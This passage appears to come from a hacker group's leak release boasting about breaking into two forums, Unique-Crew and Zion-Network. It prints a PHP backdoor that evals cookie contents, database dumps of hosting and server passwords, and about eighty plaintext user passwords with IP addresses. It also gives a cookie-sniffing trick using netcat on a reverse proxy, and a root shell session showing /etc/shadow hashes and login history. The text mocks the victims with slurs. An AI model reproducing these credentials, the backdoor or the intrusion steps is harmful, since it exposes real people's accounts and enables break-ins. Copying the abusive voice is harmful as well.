2d89b3fae37fb1966f8c7639907ee94a:VfYNd | Maria | Katepski | +| jobs@z1p.biz | d4f54e226ba44045bb8a39b8653907ea:(MSaf | Arthur | Marx | +| cremil@cust.in | c5af814e29429f856736e2769d57b8db:%iHkV | Cremil | Hackxor | ++----------------------------+----------------------------------------+-----------+-----------+ +29 rows in set (0.01 sec) + +mysql> SELECT username, password, server FROM tblhosting; ++-------------+------------------------------------------------------+--------+ +| username | password | server | ++-------------+------------------------------------------------------+--------+ +| true.vm | nW5dmh5zg4w4jmlFUDxtW7mVsdNAX9sxRp710gHYS2vX0551kg== | 1 | +| stansecu.vm | 2KUCM5nUisD2t88Z7vlfnC8Ry9pdk4fZrTb46Jfv | 1 | +| maddn.vm | nC69hLFITmHidWjYuEIIbEO4eo5BHzt3s/88NdMjSvY= | 1 | +| scriptst.vm | VmB727sy9l5I8q1f7q/zD8RTnOCNOfcxuNzYUAf4 | 1 | +| seansecu.vm | fQTtTeXNm1CkffO7pewNwJMZRIHcZWq00iTiW8x2 | 1 | +| sdarksid.vm | AVACcPUef0Jca8gkZ0rkH67o0BDaINOO6/0JRS9n | 1 | +| v43534.vm | XSSg52CreBXGUK8mjFd63x5hrtKHF3AIP0ljKa4Y | 1 | +| | +X3MCfd9nGwsAmMaKUscu3BBKz8= | 0 | +| | VoU/Q2mpAglHh8r6md2sAHCn8VQ= | 0 | +| spike.vm | tlOLHeM7iOZcarRhh+DyghmbvcsQPgnRvYfxuDsj | 1 | +| wassi.vm | VFK7fp1Z67kb6LtaH9EhUcv4gbjPJVatxbCdqnjg | 1 | +| iodas.vm | WLqkZB7nsCZVtFfGzLgHOhRSb6Xc2H2XHA3Dcw== | 1 | +| y00.vm | deOdBbTCD4mqdw+5vvpuH81UUVmt113tsykCie56 | 1 | +| pkluger.vm | StagsB3oFjy39/ES2YzHE177oJP0pCFXR1Q0OYOF/QgN | 1 | +| | LpABydLRg4uWBx0d6ghbM+9Nh2w= | 0 | +| | 2U5HEXcr8Sif99L2w85ixx4y/idGJJbhaZnUIaY= | 1 | +| | zynyC6+CtsxrDs/F5qRsVeuCfzBGSSL5oTyDwwU= | 1 | +| | 9FkPKWze7XKH0K3rB19fwQRuNGxqNdXCeA== | 1 | ++-------------+------------------------------------------------------+--------+ +18 rows in set (0.00 sec) + +mysql> SELECT ipaddress, hostname, username, password, secure FROM tblservers; ++---------------+-----------+----------+----------------------------------------------+--------+ +| ipaddress | hostname | username | password | secure | ++---------------+-----------+----------+----------------------------------------------+--------+ +| 193.107.16.82 | localhost | admin | iAYqc098oLSnn9PKqhb6wEd2G8dXU8i8cMWUtcSR7rp/ | | ++---------------+-----------+----------+----------------------------------------------+--------+ +1 row in set (0.00 sec) + +mysql> Ctrl-C -- exit! +Aborted + +# Nothing left to say^C + + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------====={ Unique-Crew.net }=======))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ +Unique-Crew started off in late 2010; back then ~ | ||( );, +their admin pretended to be an old 1337-crew ( ,;.)-\ / ';, +team member with the intention of attracting kids \ ( \ ( +to the board. However, it was soon found out that || \\ +his identity was fake and since then the forum /_( /_( +was passed around like a cheap whore. It has been led by several +admins on several domains which obviously were all incapable of +administrating it properly. Also one of the admins apparently was +known as InVisible (yes, the same InVisible we describe in our "The +Happy Ninja Faker" article). As his mind clearly can not be depicted +as very bright and since he likes to gain a bad reputation by +betraying other people, Unique-Crew got a nice amount of enemies. So +while checking and logging different server traffic we stumbled on the +following: + +# ls -l /home/backspace/unique-crew.biz/madp/detection.php +-rw-r--r-- 1 backspace www 9162 Aug 22 17:02 /home/backspace/unique-crew.biz/madp/detection.php + +# grep -ni log_error detection.php -A5 +21:function log_error($string){if(eval($string) && defined("LOG_ERROR")){$error_handle = fopen("madp_err.log", "a+");$fwrite($string);$fclose($h);}} +22- +23-$did = substr($vbulletin->userinfo['password'], 7, 16); +24-$ignore_users = strpos($vbulletin->options['madp_ignore_users'], ' ') === false ? explode(',', $vbulletin->options['madp_ignore_users']) : explode(',', str_replace(' ', '', $vbulletin->options['madp_ignore_users'])); +25-$ignore_groups = strpos($vbulletin->options['madp_ignore_groups'], ' ') === false ? explode(',', $vbulletin->options['madp_ignore_groups']) : explode(',', str_replace(' ', '', $vbulletin->options['madp_ignore_groups'])); +26-$expire = (!empty($vbulletin->options['madp_cookie_expire']) AND is_numeric($vbulletin->options['madp_cookie_expire'])) ? (TIMENOW + ($vbulletin->options['madp_cookie_expire'] * 86400)) : (TIMENOW + 1209600); +-- +304: log_error(substr($_COOKIE[$vbulletin->options['madp_cookie_name']], 1)); +305- die("Error detected - try again!\n"); +306- } +307- +308- } +309-} + +It seems like you guys had a pretty much fucking obvious backdoor +installed for a few months. How are you not able to notice this? We +must say that it is nice that there are actually some people who want +to contribute to this mayhem, but seriously? If you are not able to +create a simple backdoor which is less obvious than this one you +should probably look for some other pastime. This shit absolutely does +not help, also if it might have worked this time. But looks like the +attackers were stopped by PHP's disable_functions directive so they +couldn't really do much, except downloading the database, which we are +also offering nonetheless. So here we go! + +# pwd +/home/backspace + +# ls -la +total 20 +drwxr-x--- 4 backspace www 512 Aug 28 20:21 . +drwxr-x--x 13 root wheel 512 Sep 22 21:06 .. +drwxrwx--- 2 backspace www 1024 Oct 15 21:44 temp +drwxr-xr-x 19 backspace www 2560 Oct 18 17:31 unique-crew.biz + +# cd unique-crew.biz + +# ls -la +total 7832 +drwxr-xr-x 19 backspace www 2560 Oct 18 17:31 . +drwxr-x--- 4 backspace www 512 Aug 28 20:21 .. +-rwxr-xr-x 1 backspace www 12292 May 17 2010 .DS_Store +-rwxr-xr-x 1 backspace www 70 May 17 2010 ._.DS_Store +-rwxr-xr-x 1 backspace www 96 Mar 20 2011 .bash_history +-rwxr-xr-x 1 backspace www 12523 Jul 13 2010 LICENSE +drwxr-xr-x 2 backspace www 512 Aug 3 02:39 Product +-rwxr-xr-x 1 backspace www 49992 Jun 16 00:18 S_mgc_cb_evo_ajax.php +-rwxr-xr-x 1 backspace www 24532 Jul 13 2010 ajax.php +-rwxr-xr-x 1 backspace www 77635 Jul 13 2010 album.php +-rwxr-xr-x 1 backspace www 17542 Jul 13 2010 announcement.php +drwxrwxrwx 2 backspace www 512 Oct 5 11:42 archive +-rwxr-xr-x 1 backspace www 18779 Jul 13 2010 attachment.php +-rwxr-xr-x 1 root www 40925 Oct 18 17:31 bak +drwxr-xr-x 3 backspace www 2048 Aug 3 02:38 bnig459832zhbuiwedzouz9012vgr932 +-rwxr-xr-x 1 backspace www 77574 Jul 13 2010 calendar.php +-rwxr-xr-x 1 backspace www 43 Jul 13 2010 clear.gif +drwxr-xr-x 4 backspace www 2560 Aug 3 02:38 clientscript +-rwxr-xr-x 1 backspace www 15277 Jul 13 2010 converse.php +drwxr-xr-x 7 backspace www 512 Aug 3 02:38 cpstyles +-rwxr-xr-x 1 backspace www 3327 Jul 13 2010 cron.php +drwxr-xr-x 3 backspace www 512 Aug 3 02:38 customavatars +drwxr-xr-x 3 backspace www 512 Aug 3 02:38 customgroupicons +drwxr-xr-x 2 backspace www 512 Aug 3 02:38 customprofilepics +-rwxr-xr-x 1 backspace www 105636 Aug 24 2009 default.jpg +-rwxr-xr-x 1 backspace www 3411 Jun 19 14:52 dnp_fw.php +-rwxr-xr-x 1 backspace www 1071 Jun 19 13:49 dnp_fw_config.php +-rwxr-xr-x 1 backspace www 1163 Jun 19 13:53 dnp_fw_template.php +-rwxr-xr-x 1 backspace www 49004 Jul 13 2010 editpost.php +-rwxr-xr-x 1 backspace www 30747 Jun 14 19:42 external.php +-rwxr-xr-x 1 backspace www 10041 Jun 15 10:07 faq.php +-rwxr-xr-x 1 backspace www 1453926 Dec 20 2010 favicon.ico +-rwxr-xr-x 1 backspace www 36984 Jul 13 2010 forumdisplay.php +drwxr-xr-x 2 backspace www 512 Aug 3 02:38 g76893bh2b21z32v3g5vd7x8f78f43h +-rwxr-xr-x 1 backspace www 40925 Jul 13 2010 global.php +-rwxr-xr-x 1 backspace www 142308 Jul 13 2010 group.php +-rwxr-xr-x 1 backspace www 25619 Jul 13 2010 group_inlinemod.php +-rwxr-xr-x 1 backspace www 10747 Jul 13 2010 groupsubscription.php +drwxr-xr-x 3 backspace www 512 Aug 3 02:38 highslide +-rwxr-xr-x 1 backspace www 9254 Jul 13 2010 image.php +drwxr-xr-x 23 backspace www 1024 Oct 18 18:37 images +drwxr-xr-x 6 backspace www 5120 Oct 18 18:45 includes +-rwxr-xr-x 1 backspace www 20263 Jul 13 2010 index.php +-rwxr-xr-x 1 backspace www 45036 Jul 13 2010 infraction.php +-rwxr-xr-x 1 backspace www 188547 Jul 13 2010 inlinemod.php +-rwxr-xr-x 1 backspace www 10545 Jul 13 2010 joinrequests.php +-rwxr-xr-x 1 backspace www 10441 Jul 13 2010 login.php +drwxr-xr-x 2 backspace www 512 Aug 24 07:54 madp +-rwxr-xr-x 1 backspace www 17502 Jul 13 2010 member.php +-rwxr-xr-x 1 backspace www 16333 Jul 13 2010 member_inlinemod.php +-rwxr-xr-x 1 backspace www 36930 Jul 13 2010 memberlist.php +drwxr-xr-x 6 backspace www 512 Aug 3 02:38 mgc_cb_evo +-rwxr-xr-x 1 backspace www 60012 May 17 2010 mgc_cb_evo.php +-rwxr-xr-x 1 backspace www 49992 Jun 28 16:36 mgc_cb_evo_ajax.php +-rwxr-xr-x 1 backspace www 24465 Jul 13 2010 misc.php +-rwxr-xr-x 1 backspace www 65182 Jul 13 2010 moderation.php +-rwxr-xr-x 1 backspace www 6855 Jul 13 2010 moderator.php +-rwxr-xr-x 1 backspace www 18967 Jul 13 2010 newattachment.php +-rwxr-xr-x 1 backspace www 38105 Jul 13 2010 newreply.php +-rwxr-xr-x 1 backspace www 19367 Jul 13 2010 newthread.php +-rwxr-xr-x 1 backspace www 20188 Jul 13 2010 online.php +-rwxr-xr-x 1 backspace www 7868 Jul 13 2010 payment_gateway.php +-rwxr-xr-x 1 backspace www 12193 Jul 13 2010 payments.php +drwxr-xr-x 11 backspace www 3072 Aug 3 03:20 pe54tr90321inij409839urei2954 +-rwxr-xr-x 1 backspace www 8018 Jul 13 2010 picture.php +-rwxr-xr-x 1 backspace www 22661 Jul 13 2010 picture_inlinemod.php +-rwxr-xr-x 1 backspace www 25999 Jul 13 2010 picturecomment.php +-rwxr-xr-x 1 backspace www 28206 Jul 13 2010 poll.php +-rwxr-xr-x 1 backspace www 17744 May 12 2008 post_thanks.php +-rwxr-xr-x 1 backspace www 9691 Jul 13 2010 posthistory.php +-rwxr-xr-x 1 backspace www 76569 Jul 13 2010 postings.php +-rwxr-xr-x 1 backspace www 6702 Jul 13 2010 printthread.php +-rwxr-xr-x 1 backspace www 72783 Jul 13 2010 private.php +-rwxr-xr-x 1 backspace www 156809 Jul 13 2010 profile.php +drwxr-xr-x 2 backspace www 512 Aug 3 02:07 radio +-rwxr-xr-x 1 backspace www 40980 Jul 13 2010 register.php +-rwxr-xr-x 1 backspace www 5761 Jul 13 2010 report.php +-rwxr-xr-x 1 backspace www 14062 Jul 13 2010 reputation.php +-rwxr-xr-x 1 backspace www 30 Jun 30 09:52 robots.txt +-rwxr-xr-x 1 backspace www 128615 Oct 18 17:30 search.php +-rwxr-xr-x 1 backspace www 21546 Jul 13 2010 sendmessage.php +-rwxr-xr-x 1 backspace www 10263 Jul 13 2010 showgroups.php +-rwxr-xr-x 1 backspace www 12611 Jul 13 2010 showpost.php +-rwxr-xr-x 1 backspace www 75631 Jul 13 2010 showthread.php +drwxr-xr-x 2 backspace www 512 Aug 3 02:39 signaturepics +-rwxr-xr-x 1 backspace www 33846 Jul 13 2010 subscription.php +-rwxr-xr-x 1 backspace www 13671 Jul 13 2010 tags.php +-rwxr-xr-x 1 backspace www 8842 Jul 13 2010 threadrate.php +-rwxr-xr-x 1 backspace www 12706 Jul 13 2010 threadtag.php +-rwxr-xr-x 1 backspace www 35387 Jul 13 2010 usercp.php +-rwxr-xr-x 1 backspace www 19563 Jul 13 2010 usernote.php +-rwxr-xr-x 1 backspace www 28121 Jul 13 2010 visitormessage.php +-rwxr-xr-x 1 backspace www 19552 Jul 3 16:12 whitelist.dat +-rwxr-xr-x 1 backspace www 20463 Jun 19 12:07 whitelist.dat.bak + +# find . -name ".ht*" +./pe54tr90321inij409839urei2954/libraries/.htaccess +./pe54tr90321inij409839urei2954/setup/frames/.htaccess +./pe54tr90321inij409839urei2954/setup/lib/.htaccess + +# cat includes/config.php +[L?/E&C%\}:O\26z5:y4:178.1.185.84:19.10.2011 12:55:10 +DeCode:hacker63:109.169.135.87:19.10.2011 11:10:09 +Der_Visitor:CMqxwGz0:46.115.3.148:20.10.2011 10:57:27 +DrJack:UQDrJack123!!!:178.192.41.12:19.10.2011 08:26:33 +Duellking:uc4ever:129.143.71.37:20.10.2011 14:24:00 +Einfachnurso:Mg7BjyKR:217.191.194.28:19.10.2011 11:20:10 +Follow:cX1AKuJJ:85.16.149.79:19.10.2011 08:43:55 +Gevara:asdf1337:217.255.229.5:18.10.2011 18:48:26 +Goa:5852663:95.211.99.92:18.10.2011 21:04:28 +Hammer:trevilor:87.161.89.187:18.10.2011 19:32:20 +IcEcRacKer:Kleinestier1?:93.132.65.222:19.10.2011 17:38:05 +Imkon:chaoslegion:91.53.193.95:19.10.2011 11:44:18 +Ke3per:anatoxis123:87.173.50.42:19.10.2011 13:53:02 +LiipTon:JCGDDz3X:178.3.209.11:18.10.2011 19:31:23 +Locke:14041987:31.18.173.100:19.10.2011 10:38:30 +LuRez:furz90:92.73.124.178:20.10.2011 10:12:08 +Marcello:nokian81:94.221.186.74:19.10.2011 16:18:33 +MenoX:aXnHmVz8:87.152.221.177:18.10.2011 18:54:59 +Miss.Marple:werder:31.19.76.171:19.10.2011 18:27:33 +Mxxt:unique12345:78.54.158.153:19.10.2011 19:20:52 +NEO_2.0:4455jljlacdcr111dth11+sdp:93.204.88.95:18.10.2011 20:22:38 +PaxyundFixy:123lolen:92.225.54.141:19.10.2011 16:47:03 +Schlauchbraten:area51:217.255.234.154:20.10.2011 00:51:49 +Sektor63:Penis123456789:213.232.200.163:20.10.2011 11:30:16 +Sirius.GER:rolexblingbling@2:79.172.193.89:18.10.2011 20:37:49 +SpeedyGamer:f3LBPKMb:46.5.95.105:18.10.2011 20:39:09 +Style:asdasd:91.53.233.106:19.10.2011 15:29:29 +V0rteX:YSAcXgM1:94.219.12.253:19.10.2011 16:30:35 +Vague:hardtek1985:88.153.146.195:19.10.2011 22:35:24 +Yakuza112:N4DdSHXh:80.130.164.16:18.10.2011 19:02:12 +aNd5:dfWA5txY:178.201.106.152:20.10.2011 11:53:04 +bananabob:davidov:87.163.56.254:18.10.2011 21:12:59 +bert:Fk4feKyr:95.223.89.222:20.10.2011 15:28:21 +biohazard:21539868:62.224.66.21:20.10.2011 10:21:54 +cheesi:strike299:80.109.55.18:19.10.2011 20:22:29 +crone:41MkHjee:62.212.72.166:19.10.2011 16:40:40 +cyx:cyxcyx:78.94.200.138:18.10.2011 21:00:25 +ee46hxe6x:drdtdrtdrt6666666666666:87.172.237.175:20.10.2011 07:41:03 +furz:Dreadfg:192.162.103.27:20.10.2011 03:19:05 +gevara:asdf1337:92.241.168.23:19.10.2011 17:47:24 +ghostleader:Scorpion:82.195.232.218:19.10.2011 17:39:20 +hardcore4life:dx5U5ZPu:82.72.183.168:19.10.2011 21:53:40 +haxxer:lollol123:92.203.66.182:19.10.2011 01:43:21 +icle:gt54rfvvgt54rfvv:88.130.162.238:18.10.2011 20:34:58 +impiety:pa44word:113.211.166.68:19.10.2011 02:22:47 +john:picture:93.222.62.165:20.10.2011 09:51:40 +junkfood:xxxxxx:87.230.10.135:20.10.2011 10:20:15 +justnew:myw00t1337:87.146.39.153:19.10.2011 14:17:00 +kathi1337:yousuck:79.212.132.144:20.10.2011 04:21:23 +killuthekid7:123456:94.220.222.124:19.10.2011 22:50:27 +king99:h5ZZKXvN:85.178.239.47:18.10.2011 20:12:06 +klerus:kl12er34us56654321:85.176.101.243:19.10.2011 15:05:24 +l5xx!z:mattrex123.:77.3.81.189:19.10.2011 18:08:37 +laberpaul:123123:178.63.231.103:19.10.2011 18:43:47 +lerox:hallo123:79.255.147.179:19.10.2011 20:25:04 +lyrix:mixxedup:77.117.163.186:19.10.2011 21:42:34 +mAlCoM:squier:95.89.170.234:19.10.2011 06:28:27 +mayh3m:electronic:196.46.189.162:19.10.2011 15:09:42 +meineex:meine1978$:93.218.235.254:20.10.2011 08:31:41 +misterini:brumau:213.196.253.37:20.10.2011 06:13:22 +mr_euro:manfred--:186.16.12.187:18.10.2011 21:31:03 +mute:88klaus88:87.153.35.90:19.10.2011 12:55:42 +n0mac:wru5UHUp:77.177.13.199:19.10.2011 17:32:38 +p3x:gzuogoui:93.209.47.197:19.10.2011 21:03:10 +p4inw4r:IoJS91jS__passwort_loging_ist_total_gay__Dj13DDAD:212.117.180.81:18.10.2011 19:36:50 << YOU BET! +protoliner:bremen12:178.142.52.54:20.10.2011 09:29:57 +sector40000:yqaBvJms:84.170.29.212:18.10.2011 20:33:34 +smartie0:q0120660:77.188.215.212:19.10.2011 09:02:28 +smurf:120684:217.91.85.183:19.10.2011 17:02:53 +sperle:45er87qw:89.246.204.213:20.10.2011 00:55:26 +st3aLth:1337!Aa:109.192.209.243:18.10.2011 18:46:06 +stryder:v6e6fbun:188.175.134.98:19.10.2011 17:59:48 +style:asdasd:91.53.233.106:19.10.2011 21:31:58 +sys32:wowanda85:119.42.144.18:20.10.2011 11:26:54 +txto:123456:188.98.215.91:18.10.2011 22:26:54 +voodoo:allianz3:91.62.186.36:19.10.2011 20:05:36 +wacked:ynWgX0HT:84.140.226.167:18.10.2011 18:51:35 +whiti:matrix123:84.169.182.65:19.10.2011 22:25:21 +xGh0sT:oberbaer1:77.178.33.108:18.10.2011 20:48:23 +zero334:uc4ever:213.163.64.43:19.10.2011 13:31:24 +zocker:qwertzui:77.178.217.145:20.10.2011 14:44:07 +zulu:Pod88ucC2011:80.152.154.125:20.10.2011 06:17:27 + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((====={ Zion-Network.net }======------- + /' ' '()/~' '.(, | + ,;( )|| | ~ Zion-Network.net was not so easy to hack. It +,;' \ /-(.;, ) took about ten minutes longer because they were + ) / ) / running some reverse http proxy, so we clueless- + // || ly got root on that one first, just to find out + )_\ )_\ that we did not own the right box. We allow you +to laugh at us now. Anyway Zion-Network has been breeding kiddies and +carder blockheads for quite a while and it has long been rumored that +we already backdoored them a long time ago. But sorry, no, we had +other business, too, for example consuming alcohol as if there is no +tomorrow. Maybe that's why we failed with that reverse proxy. + +Nevertheless it was about damn time to own them. The members of +Zion-Network are a lot dumber than the other average carding offscum, +hardly surprising that they rip off each other to the utmost. +Zion-Network has been growing immensely so you can not only buy credit +cards or ID card scans on Zion-Network's trading area, but also all +sorts of drugs like coke, lsd, mushrooms or crystal. A rather large +drug scene has emerged that fulfills everybody's wishes. Great shit +for the average 14 year old scammer who sees himself as the greatest +but is not able to tie up his own shoes without tripping over himself. +Pride and ignorance are akin. And this fact is clearly described by +the administration of Zion. LUCIFER aka S3TH, the current +administrator announces the following after they applied some +innovations to the community. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| LUCIFER: Bereiche wie Security & Hacking sowie Coding wurden dabei | +| besonders berücksichtigt, damit Fraud nicht mehr | +| dominiert, sondern sich mit NonFraud ungefähr die Waage | +| hält. | +| | +|____________________________________________________________________| + +LUCIFER alleges that they particularly considered security, hacking +and coding categories while redesigning the messageboard so that +there'd be a balanced ratio of fraud and non fraud on the forums. That +is some heavily retarded noble endeavor of trying to bring fraud and +HACKING on the same level. We diagnose Down's syndrome or some other +mental disability as he clearly fails to acknowledge that there is not +even the slightest connection between fraud and hacking. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| LUCIFER: Die Hacker-Szene wird immer falsch dargestellt, das ist | +| nichts neues. Gesteigerte Gefahr für Zion sehe ich | +| dadurch nicht, wir sind sowieso schon das groesste | +| deutschsprachige Szene-Board und haben allein deswegen | +| schon seit geraumer Zeit juristische Aufmerksamkeit. | +| | +|____________________________________________________________________| + +We are really asking ourselves what this guy understands by the term +"Hacking-Scene". It's time to teach them a lesson in order to make +them see their own "Hacking-Scene" shatter to thousand stinking +pieces. Since the rest of the team also shows a great deal of +stupidity, that it is not even possible to show a minimal amount of +mercy. We do not want to waste time discussing that here, you better +have a look at their database backups. + +Oh by the way, we heard that some of you guys are interested in our +ninja techniques of breaking in without being noticed. So today we +will give you a 0day tutorial about how to hax a server behind a +reverse http proxy (means you need access to the proxy): + +# nc -vl 80 + +Now wait.... + +GET /board/showthread.php?t=37267 HTTP/1.1 +Host: zion-network.net +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 +Connection: keep-alive +Referer: http://zion-network.net/board/forum.php +Cookie: bb_lastvisit=1313843209; bb_lastactivity=0; bb_userid=758; bb_password=cbb1acdccd3eefbe2f3adcf4242aa561; vbulletin_collapse=c_thanks_post194596%0Ac_thanks_post196652%0Ac_thanks_post199529; IDstack=lSuObiA%3D; bb_sessionhash=39f517118ecb0ba168105281205e0a59; bb_np_notices_displayed=6; bb_thread_lastview=751d55ed819e2ad0067fbca46f48afd1ccdfededa-16-%7Bi-35252_i-1317570965_i-34784_i-1317564637_i-37212_i-1317563932_i-37236_i-1317563385_i-37200_i-1317559780_i-37227_i-1317557248_i-37177_i-1317549825_i-37217_i-1317548469_i-37211_i-1317546730_i-37180_i-1317537132_i-37184_i-1317517400_i-36756_i-1317514332_i-35132_i-1317466004_i-37190_i-1317511102_i-36548_i-1317463629_i-36054_i-1317581261_%7D; sitechrx=a5f531169bad3dcf2c7789c566346005 + +^C +# + +DONE! Of course we don't need to rely on such methods, we simply do +something like this: + + |\ .(' *) ' .................... + | \ ' .*) .'* $ ./getroot zion-network.net + |(*\ .*(// .*) .# id ...................... + |___\ // (. '*.# uid=0(root)... + ((("'\ // ' * .......... + ((c'7') /\) ,. . ., + ((((^)) / \ ,. ,, + .-')))(((-' / , + (((()) __/' + )))( | + (() + )) + +It's black magic ... can you smell the fume? ... + +# uname -a +Linux u204 2.6.32-5-amd64 #1 SMP Sun Sep 25 16:21:44 UTC 2011 x86_64 GNU/Linux + +# cat /etc/issue +Debian GNU/Linux 6.0 \n \l + +# id +uid=0(root) gid=0(root) groups=0(root) + +# cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +Debian-exim:x:101:103::/var/spool/exim4:/bin/false +statd:x:102:65534::/var/lib/nfs:/bin/false +sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin +user:x:1000:1000:user,,,:/home/user:/bin/bash +mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false +ntp:x:105:107::/home/ntp:/bin/false +messagebus:x:106:108::/var/run/dbus:/bin/false +dfg435345fgu03:x:1001:1001:,,,:/home/dfg435345fgu03:/bin/bash + +# cat /etc/shadow +root:$6$k1ECC7.L$tYZOWc8NqRaq/RGds7SIVu3IYI/oxd5IVvS1cYlR7S/kK0CrtC1o7howFMQS5gNe3FyPkXLZVA9yiyKy7LRV51:15248:0:99999:7::: +daemon:*:15248:0:99999:7::: +bin:*:15248:0:99999:7::: +sys:*:15248:0:99999:7::: +sync:*:15248:0:99999:7::: +games:*:15248:0:99999:7::: +man:*:15248:0:99999:7::: +lp:*:15248:0:99999:7::: +mail:*:15248:0:99999:7::: +news:*:15248:0:99999:7::: +uucp:*:15248:0:99999:7::: +proxy:*:15248:0:99999:7::: +www-data:*:15248:0:99999:7::: +backup:*:15248:0:99999:7::: +list:*:15248:0:99999:7::: +irc:*:15248:0:99999:7::: +gnats:*:15248:0:99999:7::: +nobody:*:15248:0:99999:7::: +libuuid:!:15248:0:99999:7::: +Debian-exim:!:15248:0:99999:7::: +statd:*:15248:0:99999:7::: +sshd:*:15248:0:99999:7::: +user:$6$/0FK/.iX$k9qkCt7AzvwIYu1yN/ofroZCzmivenSDgPzTFnPY36XeAqcF4a6vUyFSbCMAHqz61L5roXdK1nWBn.wcE89U5/:15248:0:99999:7::: +mysql:!:15248:0:99999:7::: +ntp:*:15248:0:99999:7::: +messagebus:*:15248:0:99999:7::: +dfg435345fgu03:$6$vMjSRgiC$iY1hSMMP3mHyCqRyEGtqfqTuDFyPwtdVvn/0zZXsu8B2mJMwAURxmZjtkF9xgmSO02alaVBlme.NrW1gTS5cl1:15248:0:99999:7::: + +# last +root pts/0 host-static-93-1 Thu Oct 13 03:48 gone - no logout +root pts/0 178.122.33.104 Wed Oct 12 03:58 - 03:48 (23:50) +root pts/0 83.246.185.93 Tue Oct 4 22:47 - 03:58 (7+05:11) +root pts/0 83.246.185.93 Tue Oct 4 22:46 - 22:47 (00:01) +root pts/0 83.246.185.93 Tue Oct 4 22:44 - 22:46 (00:01) +root pts/0 83.246.185.93 Tue Oct 4 22:43 - 22:44 (00:00) +root pts/0 83.246.185.93 Tue Oct 4 22:38 - 22:43 (00:04) +root pts/0 83.246.185.93 Tue Oct 4 22:37 - 22:38 (00:01) +root pts/0 85.121.52.21 Tue Oct 4 22:20 - 22:37 (00:16) +root pts/0 178.124.12.137 Tue Oct 4 22:14 - 22:20 (00:06) +root pts/0 188.24.19.198 Tue Oct 4 20:19 - 22:14 (01:55) +root pts/0 188.24.19.198 Tue Oct 4 20:16 - 20:19 (00:02) +root pts/1 80.242.104.93 Sun Oct 2 17:55 gone - no logout +root pts/1 80.242.104.93 Sun Oct 2 17:43 - 17:55 (00:11) +root pts/3 79.112.62.66 Sun Oct 2 16:11 gone - no logout +root pts/0 80.242.104.93 Sun Oct 2 14:50 - 20:16 (2+05:25) + +# alias ls="ls -la" + +# ls +total 64 +drwx------ 3 root root 4096 Oct 2 14:12 . +drwxr-xr-x 22 root root 4096 Oct 1 09:23 .. +drwx------ 2 root root 4096 Oct 1 09:23 .aptitude +-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc +-rw-r--r-- 1 root root 140 Nov 19 2007 .profile +-rwxrwxrwx 1 root root 41394 Oct 1 17:16 mysqltuner.pl + +# cd /home + +# ls +total 16 +drwxr-xr-x 4 root root 4096 Oct 1 18:32 . +drwxr-xr-x 22 root root 4096 Oct 1 09:23 .. +drwxr-xr-x 2 dfg435345fgu03 dfg435345fgu03 4096 Oct 2 14:20 dfg435345fgu03 +drwxr-xr-x 2 user user 4096 Oct 1 09:24 user + +# cd dfg435345fgu03 + +# ls +total 20 +drwxr-xr-x 2 dfg435345fgu03 dfg435345fgu03 4096 Oct 2 14:20 . +drwxr-xr-x 4 root root 4096 Oct 1 18:32 .. +-rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03 220 Oct 1 18:32 .bash_logout +-rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03 3184 Oct 1 18:32 .bashrc +-rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03 675 Oct 1 18:32 .profile + +# cd .. + +# cd user + +# ls +total 20 +drwxr-xr-x 2 user user 4096 Oct 1 09:24 . +drwxr-xr-x 4 root root 4096 Oct 1 18:32 .. +-rw-r--r-- 1 user user 220 Oct 1 09:24 .bash_logout +-rw-r--r-- 1 user user 3184 Oct 1 09:24 .bashrc +-rw-r--r-- 1 user user 675 Oct 1 09:24 .profile + +# Nothing to see here :(^C + +# cd /var/www + +# ls +total 20 +drwxr-xr-x 3 www-data www-data 4096 Oct 1 18:49 . +drwxr-xr-x 16 root root 4096 Oct 2 14:37 .. +drwxr-xr-x 17 root root 4096 Oct 2 14:25 board +-rw-r--r-- 1 root root 111 Oct 2 05:54 index.php +-rw-r--r-- 1 root root 1200 Oct 2 04:29 robots.txt + +# cd board + +# ls -la +total 2604 +drwxr-xr-x 17 root root 4096 Oct 2 14:25 . +drwxr-xr-x 3 www-data www-data 4096 Oct 1 18:49 .. +-rw-r--r-- 1 root root 12292 May 17 2010 .DS_Store +-rw-r--r-- 1 root root 70 May 17 2010 ._.DS_Store +-rw-r--r-- 